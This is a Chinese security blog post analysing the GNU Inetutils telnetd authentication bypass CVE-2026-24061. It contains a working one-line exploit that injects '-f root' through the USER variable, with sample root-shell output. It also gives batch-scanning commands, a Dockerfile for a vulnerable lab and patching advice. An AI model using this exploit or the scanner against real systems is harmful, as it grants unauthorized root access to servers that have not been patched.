文章总结： 本文分析GNUInetutilstelnet高危漏洞CVE-2026-24061，攻击者利用USER环境变量注入参数绕过认证获取root权限。影响1.9.3至2.7版本。提供POC、扫描脚本及复现环境，建议升级至2.8或禁用服务修复。 综合评分： 90 文章分类： 漏洞分析,漏洞POC,漏洞预警,渗透测试,安全工具

GNU Inetutils telnet远程认证绕过漏洞（CVE-2026-24061）分析及自查脚本

原创

MY0723 MY0723

不秃头的安全

2026年1月27日 16:30 北京

GNU Inetutils telnet远程认证绕过漏洞（CVE-2026-24061）分析及自查脚本

前言：本文中涉及到的相关技术或工具仅限技术研究与讨论，严禁用于非法用途，否则产生的一切后果自行承担，如有侵权请私聊删除。
知识星球和交流群在最下方。
需要cn*d（中高）/c2n*d（高与支撑单位）/安全证书请联系vx咨询

近日，GNU Inetutils telnetd 被曝出一个高危远程认证绕过漏洞（CVE-2026-24061），CVSS 3.1 评分高达 9.8，攻击者可通过精心构造的环境变量直接获取root权限，危害极大。

1.🎯 漏洞描述

GNU Inetutils telnet远程认证绕过漏洞(CVE-2026-24061)，该漏洞源于 GNU Inetutils telnetd 组件中对环境变量处理不当，攻击者可利用该漏洞，通过构造恶意的 USER 环境变量并发送至受影响的 telnet 服务，触发认证绕过机制，进而实现无需密码直接获取root权限。

2. ✨ 受影响范围

1.9.3 <= GNU Inetutils <= 2.7

受影响系统：

• Debian 12 / 13
• Ubuntu 24.04 及更高版本
• Kali Linux
• 其他默认安装并启用了 GNU inetutils-telnetd 的 Linux 发行版

3.🛰️ 漏洞详情

该漏洞的根本原因在于telnetd在处理环境变量时，未正确过滤恶意参数。当客户端通过USER环境变量传递”-f root”时，telnetd会将其直接传递给/bin/login程序。login程序的-f参数用于强制登录指定用户（通常用于预认证环境），从而导致攻击者无需密码即可登录为root用户。

漏洞触发过程：

1. 攻击者构造包含”-f root”的USER环境变量
2. telnetd服务端接收环境变量并传递给login程序
3. login程序执行/bin/login -f root命令
4. 系统跳过密码验证，直接授予root权限

技术原理分析：

• Telnet协议（RFC 1572）支持在连接建立阶段传递环境变量
• telnetd以root权限运行，有权限告知login程序强制登录
• 参数注入导致认证机制被完全绕过

4. 🔐POC及脚本

🛰️手动验证POC:

# 设置USER环境变量为'-f root'并发起连接
USER='-f root'&nbsp;telnet -a <target_ip>

预期结果：

Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
root@vulnerable-server:~# id
uid=0(root) gid=0(root) groups=0(root)

🌐Python批量扫描脚本：

主要功能：python CVE-2026-24061.py -h

不想环境搭建的直接启动mht无镜靶场，配置好openvpn配置文件

python CVE-2026-24061.py 192.168.1.1
python CVE-2026-24061.py -f targets.txt -p 23 -t 50 -v
python CVE-2026-24061.py -f targets.txt -o results.txt

利用获取到flag~

flag{7908beb36e97ca53547940c48b849b17}。

5. 🛠️ 环境搭建

想本地搭建的可选择下面两种方式。

（1）Docker环境搭建（推荐）

将以下内容保存为Dockerfile：

FROM ubuntu:20.04

ENV DEBIAN_FRONTEND=noninteractive

# 安装必要工具（加上 net-tools/iproute2 方便调试）
RUN apt-get update && \
    apt-get install -y inetutils-telnetd xinetd net-tools iproute2 && \
    apt-get clean && \
    rm -rf /var/lib/apt/lists/*

# 配置 xinetd 的 telnet 服务
RUN echo 'service telnet
{
    disable         = no
    flags           = REUSE
    socket_type     = stream
    wait            = no
    user            = root
    server          = /usr/sbin/telnetd
    server_args     = -h
    log_on_failure  += USERID
}' > /etc/xinetd.d/telnet

# 允许 root 从 pts 终端登录
RUN echo -e 'pts/0\npts/1\npts/2\npts/3' >> /etc/securetty

# 设置弱口令（典型 CTF 默认凭证）
RUN echo 'root:root40441111' | chpasswd

EXPOSE 23

CMD ["xinetd", "-dontfork"]

构建和运行：在 Dockerfile 所在目录执行

# 构建镜像命名为vuln-telnetd
docker build -t vuln-telnetd .

# 运行容器（直接映射23端口）
docker run -d --name telnet-lab -p 2323:23 vuln-telnet

# 测试连接
telnet 127.0.0.1 2323

（2）手动环境搭建

在Ubuntu/Debian上：

# 安装受影响版本的inetutils
sudo apt-get update
sudo apt-get install inetutils-telnetd=2.0-*

# 配置inetd服务
echo "telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd" | sudo tee -a /etc/inetd.conf

# 启动服务
sudo systemctl enable inetutils-telnetd
sudo systemctl start inetutils-telnetd

6. 📑修复建议

立即措施：

1. 升级GNU Inetutils到最新版本（>= 2.8）
2. 临时禁用telnet服务：sudo systemctl stop inetutils-telnetd
3. 使用防火墙规则限制telnet端口访问

长期解决方案：

1. 迁移到更安全的SSH协议
2. 实施网络访问控制
3. 定期进行安全审计

配置缓解：

# 禁用telnet服务
sudo systemctl disable inetutils-telnetd
sudo systemctl stop inetutils-telnetd

# 防火墙规则
sudo ufw deny 23/tcp
sudo iptables -A INPUT -p tcp --dport 23 -j DROP

7. 🔄 脚本获取

公众号回复”20260127″即可获取完整PY脚本链接

8. 📄往期推荐：

ShiroExploit_通过另类手法实现Shiro一把梭 渗透测试 | fuzz参数拿下网站管理员权限 Apache Struts XWork XML漏洞CVE-2025-68493 poc及脚本 新款Shiro漏洞利用工具- Y5neKO

关于我们:

感谢各位大佬们关注-不秃头的安全，后续会坚持更新渗透漏洞思路分享、安全测试、好用工具分享以及挖掘SRC思路等文章，同时会组织不定期抽奖，希望能得到各位的关注与支持，考证请加联系vx咨询。

1. 需要以下各类安全证书的可以联系，后期可能涨价~

①Cn*d，NCC，NVDB🀄️高漏洞证书

②CNNVD中高\漏洞情报\ 一二三级支撑单位均可协助获得

③CISP、PTE/PTS、CISP-DSG、IRE/IRS、NISP一二级、PMP、CCSK、CISSP/CCSP、CISAW各种类、CCRC\CCSC、itil、软考中高级、CDSP各种类、CISA，oscp等等巨优惠。ISO27001、ITss服务项目经理报名等下证即可，证书组团报更便宜，可对公，可开专普票。想加群下方链接，群过期或群满加下方vx拉：

2. 需要入星球的可以私聊优惠？

1、维护更新src、cnxd、cnnxd专项漏洞知识库，包含原理、挖掘技巧、实战案例
2、fafo/零零信安 高级会员key
3、最新POC通用报告详情分享思路
4、知识星球专属微信“内部圈子交流群”
5、攻防演练资源分享（免杀、溯源、钓鱼等）
6、新鲜工具分享
7、不定期有工作招聘内推（工作/护网内推）
8、19个专栏会持续更新~提前续费有优惠，好用不贵很实惠

3、其他合作（合法合规）

1、承接红蓝攻防、渗透、安全意识培训、基线核查及加固、应急响应、重保防守、代码审计等安全项目（须授权），需要攻防团队或岗位招聘都可代发、代招（灰黑勿扰）；

2、各位安全老板需要文章推广的请私聊，承接合法合规推广文章发布，可直发、可按产品编辑推广；合作、推广代发、安全项目、岗位代招均可发布；

3、接受脱敏投稿,送一年知识星球及礼包。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：不秃头的安全 MY0723 MY0723《GNU Inetutils telnet远程认证绕过漏洞（CVE-2026-24061）分析及自查脚本》